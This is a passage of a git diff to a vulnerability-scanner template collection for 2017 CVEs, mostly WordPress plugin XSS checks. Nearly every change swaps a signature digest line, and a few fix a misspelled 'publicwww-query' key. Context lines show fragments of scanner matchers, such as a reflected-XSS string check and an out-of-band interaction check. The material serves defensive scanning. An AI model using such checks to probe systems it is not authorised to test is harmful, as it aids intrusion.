4a0a00473045022100fe52a75e4f1ca1cf7e06558a3653f93c966389db424bd5d20dfc3b3ee59e7fd8022058a7b43fa0a16c0dc9b5477158afaa6bf8438f6de769c5b42d7b907b95e1a0ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e15727b0ddf652065861bf22bea1c0e93ae8134932a63f1691a2256adbd1b25602201f24ab36ca2f64094ec81fa3f92890da072058fd9f23c5802569ecd06afcb00c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index e175926f61..8f9ac61405 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google AdSense")' condition: and -# digest: 490a0046304402204e773854fc4d5e626d1588c88d757a817ce9d61957c4dfcac54562a9fa8ab4c802205fdb3252c167cb94b69d6ea4b597a6f508aca8ee87824772d38c983c80754c22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac224191317b7f9d5c8305933b2f932fc9c11bbb1d356f807a34412326386f6002201ffc830ad1f53205651cbf36c8e55b45f44beea9ded57833044904fb6736187e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index 3d8627b899..bcbe1eff61 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form Multi by")' condition: and -# digest: 490a004630440220439cf5924865e04eabfcf00ff470681c45ab0cbf24fcf838ce3f9fad76614338022045f34b3d1afe7bbe3f1b785cb9e3730d2490a03c47cd3d54d0068f87884bcf3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047a86d472b4963557d6bdde6b11f2b646e6313f13a90a273e1fce430e894092102205e15a23b0220c1cbb8df6bccb36fd1346acd96b67121cd1349c4c4016415f034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index bdb354e685..73517d0595 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form by")' condition: and -# digest: 490a0046304402207d4bd4dfbcfe308f7c42e847d299dc7a03d16e716869b0aca3840146813451d302205dae460ad6a28018fd390da16e0f31e9a7f6ce6802e6297b0fc1f8d5161b9fb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022aaa77f0654980937b928d490f572e59c3e40755b874d4e7ff6a7168136202b02203fcd59db42dff8780151fd38459c2b921a77502f91ff4c72364ad218117af4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index 6b0e63cf45..c7fa05e53a 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form to DB by")' condition: and -# digest: 490a0046304402202b3185db4264596ef34491ad3383e52105d05589e9bb8816d92778e029e22aa702206bcc85fb85a299a74f0fe68159664b9217740ef59d44cf33e4e241c2c8041b5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009117b9d4328ea3a5d94d9ecd68c3c1402e95a82c3b7f5946adaf2c0210a7dd9302203ec8c8a43e1798ce9f668234b12d6d47f7b08c68abd2f858016c8b168794db62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 0454567bf8..0d6b511623 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Admin Page by")' condition: and -# digest: 4a0a00473045022078b390941712aed4e41cfe7d2f0ddeb1daa85e17e6450605666319527c75edf5022100ee6d9a490ad8a1ddfabf6e8d827820c74c4c4e58316da606a04f77bf8ce7d474:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8f985f73aa53f158d7b69dc00405ae8393492e82583cda9393d45d6e09b86df022100f47e60f2df1bbdfee0a7a9497bda25b96739c2c69f49f2d8b587082bc45df3b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index b4fd8d439e..d1554790f4 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Buttons Pack by")' condition: and -# digest: 4b0a00483046022100eed7d58e22711ba25fdd7b4d8ed9ecd65234521a4173d5e0fa57685c2ad88ab2022100e0dbdc6ad5770d0218284792264571408604690aba1ad3c2e14dbbc706b37a4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f89fb19d15fb08118427dcbbec861334e2869b19a7f7629f950880a2b1a030a402204c072011a5c2993febfb3b7ebae8ee5904fd3f1ab56497f1dbfcdc2b0383083d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index cf3af0b4bd..7f84a097f0 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -25,7 +25,7 @@ info: vendor: bestwebsoft product: social_login framework: wordpress - publicwwww-query: "/wp-content/plugins/social-login-bws/" + publicwww-query: "/wp-content/plugins/social-login-bws/" tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft http: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Login by")' condition: and -# digest: 490a004630440220612a0d038365b3d23a4c45ba07d236834aeff37e26b7dae9317151eebabb2ad8022021ff8d384b2a4488135e04cf36e55df7e627a6800702edad9f8798074a4bda99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afda914e7e9726b246e585b8f4faa2ff861c17837ff01ded7c22cbaf1e4ea39e02205a4ecb7f7af6fbd5809cb254f685cee642439232493671b38962a87dfed0b84e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 6cc152b43f..93ddcfad77 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Twitter Button by")' condition: and -# digest: 490a0046304402200718337177c823f399f197c6afdedaab75b2d92ad8aef6fc4da841ab841dbfc8022076ca30c81b0ee0c9416c0037c6406fa15f7ff17db8ff9b548b643d3e7256ae70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a1c5828cf67da18081cde718eb3df76029916bef83ff06ee5d51264e37751dc10221008c464e7a9ae6f75aabb858462c3a0fd473bfcf2e3940b8611d895617e2fb7d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index 1b75f7fa58..a6aa60cd0c 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -26,7 +26,7 @@ info: vendor: bestwebsoft product: smtp framework: wordpress - publicwwww-query: /wp-content/plugins/bws-smtp/ + publicwww-query: /wp-content/plugins/bws-smtp/ tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft http: @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and -# digest: 4a0a00473045022100ddbc3b18ffce5c0f01e6aaa0a53e37a9e1ffc322041f4005d0da986b8424ba5802200829e15dc39b3ab7ef7518c4fc9fb54dcfd91dd62b06db7b9b515cc620ffe042:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca4f19febda81cd89ac62f3d319631ca3ba438d5c136b4119a5b590e76b81eb4022100c2f1c4f238b7b72d78dbdcfb3579a60e7abd1c1f1e92f5767756df9efdf59ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index 8b54371ff9..5e2a3b4028 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -25,7 +25,7 @@ info: vendor: bestwebsoft product: pdf_\&_print framework: wordpress - publicewww-query: "/wp-content/plugins/pdf-print/" + publicwww-query: "/wp-content/plugins/pdf-print/" tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft http: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and -# digest: 490a00463044022015900e7f9135913427df6b19a4652cc37719770f766e73f32edb19944009516702206593c0fef56e6b285d44c4726dba2c53d3f69815c3513eeb63c38e034f228cee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bbd7d8507fd10adffb260fac65763dd3af0450f57124c9588276e948193a1f4a02205120b25ba77cad36eec889f71816330835a4b76d3e08924a6bfea9d372b399f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 8ad39e490a..844e663cbb 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and -# digest: 4a0a004730450221009bff238bd64946c67ee890059dd221f87b2d35f7ad9d44bea2ea436f6b5f6b7802200c3e7f2aa6d89f0570866b2bf5d30f6788920246eb34a62d4de1e9eb5bfd4ea8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c33283fd423db70d402c7fd047dc7bebc3eec4bff361ff9d59d4b1efbf225c3d0220245cae47085cf15e815dc7d291310b1550e49f9eef084e23e11863a4392656f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 9a927c65b2..f926ec8b94 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and -# digest: 4a0a0047304502202e719f0dae5304a4569d324ed771c2b53e08a493be66f51eea03d084eb9add8a022100dc1971893c34816ed89d0f506980669e8cbf8e8f15dbf6da10441cc6326192f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220370407ad931bf1c297e16c99d3c5c1ca953628677fc94ea86715e3131e2b0233022100f740ab11752605c7ddc1fe1f1c1724858aad10d2b52e78f1f9f4a416290da561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index bce7b19faf..a967010a40 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -25,7 +25,7 @@ info: vendor: bestwebsoft product: visitors_online framework: wordpress - publicewww-query: "/wp-content/plugins/visitors-online/" + publicwww-query: "/wp-content/plugins/visitors-online/" tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft http: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Visitors Online by")' condition: and -# digest: 4b0a00483046022100e0cacd9ce22e7e476c46d710aae240b0c930499d0e6d55aaf815967cd386260d022100bce40f1e65b52f1ec189a048406c5bcbcfe63dd7c8ec57d51489a550b0319b25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6694c2351da20106780916ead57acded8b3561215bff593cfc360a10dedda34022100c75806459a4114b92d8648e825188a9cbc42ba259aa226de782c73040b0007dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index 8b5c5fffb0..4dc23667c9 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and -# digest: 4b0a00483046022100a579f6428f55d116cb8ba091953c92e0d38dd6f635181897f6c477dcdd6b03ac022100f6d1cf80c0c595d4ed642dd9a27b61f656fa29d92b2c8ddec90127489556f5e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f7aefa84c2f74418d8bfda7eaebb599348ddbbfb4c230fcfc56a9b82ccc1b3d022100eeaecc0e672ed38b43954db6259d083cd20eb2535283ec8ac0e9154f6d71d649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 027ace8f89..0069a24e8b 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google Analytics by BestWebSoft")' condition: and -# digest: 4b0a00483046022100be299891e27e6b33691ff639c81e6e5deffd2f3c72d46e198cf94aaac0791a5002210081f4889063d5a8e3b084fd66180205a7c2cad12afdd7a5da3766882818daa2b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022058df345caa79fcc85007be091f7b75d399b7d9f2502995f539f1e3387b69d9e7022100d5f4cc931077b75d81472cc62173979120b245394f458e0e02215ea798ce26bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index ae8dbb2e26..ac1987e5ac 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and -# digest: 4a0a00473045022100e9b17bb7751da7ad9e69721d0291794ac475d944c9eacdf5cbe4e2ee125633fc02206027eca74270a6d83b07ec8d987ee177bc0abb25ef9787c5c0f87fba6eefd383:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008db3605db8249b8d03ef76b687a919f1586b95a60fd71fb15afb8cc74ba152130220371bf249484018debba5b816e27dcf3f7d8fdd724c87788635a6136b1266ef07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index 249704cc38..4aa9bf9453 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and -# digest: 490a00463044022053e7da3c3f13053606de2c45b1d264e04b12a77f34cb0a48c2670584fb2457ec02204c57cf4932f30b9a27a6579955b21c60de4df3cdfae1f7b41dde53142499de74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206bf5a1ea4bf5034892e440458b150b6df66ff63e42a5677e30878b7d4b43d34102205868e55cb82cdee0363c36f0da53f76767397ddc734f06b2df94b8835493bbe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index 2ddf1acd93..8c99ba4b6a 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and -# digest: 4a0a0047304502210087beb5df9e68ac231eae4823773170f7a998e6dd074e853416d0d99dba665393022041dc7386f659e6359d67b02c787d05fe0f0765fe90ad989f047b6a956a20d714:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a044599dd64fbe525d5491598bb2bd08fb20f3b1246daa85cf894198d9a4b72a02202c881e075c5cf297c2153729f9a3bca4925a615334a49850ca79a635c41b5efb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index a8b32fb92c..c1a7efadd4 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -59,4 +59,4 @@ http: part: body words: - "console.log" -# digest: 4a0a0047304502202f580a33ffd420240fb383076ae906b3809a216440e20bbfd1f3d9448115dc97022100d48800da6d46341eec800398fa959a8eb214ec9c29c412755ed7e0367fdaef47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf8507ec0a07fb4ab6ad2ea84e25c016d344f3b24aa8f4e34d1c9b480b250067022100dff39226828bac2fee2fb6b66059f32cc585ae79aeec9ae6bba3590caa369e91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index bc2664a978..4b4be69409 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -58,4 +58,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022066d2b0ccecf1f505bdd9aa980175fc8a122071c6e21e5d88854eb17add775c06022100e6ca999c57859e98a266abab4f73d2dd6478551d58486037e1543987a0446876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009af3dc7a023956f425c329f162e8bf603416c546b1876ce01e72ac09119bc24202205406c351433b267b3312803f8f1cd75b9707dfc851008977f33e4db88e70404d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 5fd34ed21c..34e1582b67 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -37,4 +37,4 @@ http: part: body words: - 'noresize src="/\interact.sh?configName=' -# digest: 4a0a004730450221008e5cf4a7188368bdf7c48b71ca73bcdf24be4f135a4b4f1faa326226b2602ad6022043066468b71926f652cb002c8017a440198a68b8414142f7b438d155e2c83c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100af3043267f661047f2abd255139659c6876cf783ed9a49639876eac74d86842f022100e4a34a3823612505eff0f06d3c4e61785f3cd30694b6d799da940a7b4bd501e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index e859ed879c..a39445b71a 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -48,4 +48,4 @@ http: part: header words: - "text/html" -# digest: 4b0a0048304602210082e8a99305a0d02578786fa86786227ecd9e97204ec133b411441b070eb5d76e022100d1a91d167063225f939dd702b8166495d4be6dd98a4d686b6277ceade578ca09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b96f472aaedfc274fdfdec8a3b816d78acbc2505300b1d40c565b457822a0cce0220437e462685b9f8c0bc91b355e244b8882fb26379f7d5f3c244f591b218cac549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index a899b6f484..4a75dec841 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210089f570e3ec2b88353093a7144cfdcf216beeac95ea68e2df55bd01b7a671d713022100ad080f5e730599464be9137e2ba186d7a2176b7fe8694ffcd92daeb0b3c1e9c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b13a1627744af175b5ff3208123d7121d1993c1da5916daba690480cb512f923022100fbb3814519400f6165a557af4ce8f740fd1f47aead0436e981e555de1894a22d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index f73eb1f97f..31c5b32685 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204f10f62c09409106306f61ea0abf4be1da9a9bbd4af68f0e2768b8d469a6dc88022016fc87daf17d7aa5efedebe65262c5ba3615c893ee3565d12aeee386763425f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c1ebf3bfcfaab0443bed7c0c3767867af141501aac600f4f387e61c7d0dab97c022060fd9aabe9ac1b63059fb46dfa7eb24a6b438f68a5ee9f4f028cb7e65532233c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index 7c34620384..e168585ac3 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210096965f3c5fda2067440033d2eb9e7db89af243d0fb16f98f7089cdf789b0ca270221008c564bd77041ef3d30f4433d9db5b84c3a9bed276f7f27a5c3a26d2277913e89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa4dbd08aff64d97403d7fb368e7231d1a0730e75422275f56f2de2d62285992022100d2b8678f5fb9dc8a061deabd9eaf63b6ee9db983944639a0c7d1fe041ac49d57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 14ff4c2c75..9514f14b50 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203a433941ce05ae602a9e1dda7baad129ec4327d5427c2d9334843d9dfdf9f7660220371a72d791c7cd28aacebd3f56bb2be2beb0cfa5d682311cfcbd80bc32f1d8a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022020aa8a873fc818a13eee28f236f26cae0b0aa75204ada8c216d36f82b6d7c022027edcd8a1cc6e78bf98d96759d25094658fc6bce1a48f195a363cece01b7f99c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index c24a9f9b83..ed275c5a6d 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201d796da11ec845433f4d7933234549b368533866b3578164ce0964aa4bc56c1e0221008107250ebc07699303e83b25f2a344785d4d2b9c261d2a001d7d01a88291d992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220255b4c36fbfca640300f406d76a18de517faa9583bb267338fc7a2d4b36ac070022100e236f6809fd321445907dbc37b9c4def04ad09fc52f798e4324fa84812fd5331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index de94cd8f90..dce109934a 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d2fdd3ea6243caf5ecbf066fa043bc189c219ddad8120159650bd83852c34652022100c07dbc19dbc07419f9b7dc7371eb6dc9c659a5900dddb26892ebde5a1e2a51a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200b9e716101bb9f2757f476a63cfce5c17b9dd089a0ba767e03f491ecace39fb6022045455d4187be15412d331dd2b561c4328cdde8acc3c42a3de9f9ceb407376d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 0b98ea0fc9..73a298378d 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e4aa1b07cacbb6405f5911131f1874f193457a4211fbba60681d13db34f7559f022100b478da782d507d2edb0e43567ac4e9a61232ba97bee470889c209251f66f47a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ecd748d0da7f1f3e5a44b0351d29bf699e21b0bcfd59e00013b81f7dde887d6f02204f738f06eb2c47e277ac21b6bf66fc965783038678586e2b9e397c57124bc240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index d1d11d284d..cc1ad0e3e8 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -45,4 +45,4 @@ http: part: header words: - "application/xml" -# digest: 490a00463044022006bf1328d98ef7a765e9a467bb2ae47ad3c65f4b1f0b4fa5b8e9b2356907511a022027601c3d3665c0854704bfd676295821b7ecb55c4fd4cafd64afc3905f8b6674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c915ea5b7a67b269e652cfe5189fbeef5beca1a6e3a09c0ee59298ed9bfbede3022100a8f03caa34047f0f2cd4751cf4c772529f216a56e3e91553f99c1a7eef9bd6e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 45caf22abf..4e91d62001 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -47,4 +47,4 @@ http: group: 1 regex: - 1:(.*:.*):1:CtrPanel -# digest: 490a00463044022100ff3ff39cfa57fa916fe1cbe121d004266181efd4a12eacba54f2e940e8feefab021f361f7bbc388eb8dd2decacd5d6e6bc69036d444cc6813f8ce0aecb7be24b2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b025841e51356e6480d45b4bdac30058df82b301fc177b329ddfaae64739dc7d022055c5f87e84ec531417e24f1d4eacca97cbb1485d8cda61206978c53803ee605b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index e973dfeeb1..d2bb37a789 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207d535c00d6e28947100959bc26dfcbf8d085e39e0d35e846e12f0f30c5292b9302200edc7b5e5d64ff0f41506b9c10f589f67e27fb8acc02eff281b8d7eca16d602a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6fd9d1debb3a00599d529ed9870adb5c6425994cafe24875150518f3a770549022010a916473eeea40a72614d21ce4acd2715c401e4e6bd33fd9bdf6440eac4788d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 1630cb3678..036670e1de 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -44,4 +44,4 @@ http: part: body words: - '{{md5(num)}}' -# digest: 4b0a00483046022100f1a0746bf50589df8124bf61012bf3d11534c54a8083228b4a892c25a511847802210096e341c26d6d7f387a036a5ea2a610e9aa77916deb835832495db8b5fc763e0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a42607f81069bc80a480ecb156ace94e0e76862ee4d3c4f68a9b927f241d59402207c07437e69c7376ab7c771a7bb2fa469bcc225985cb16e57a19da92fe3f20241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index c23c2f7013..de79ed77ef 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -44,4 +44,4 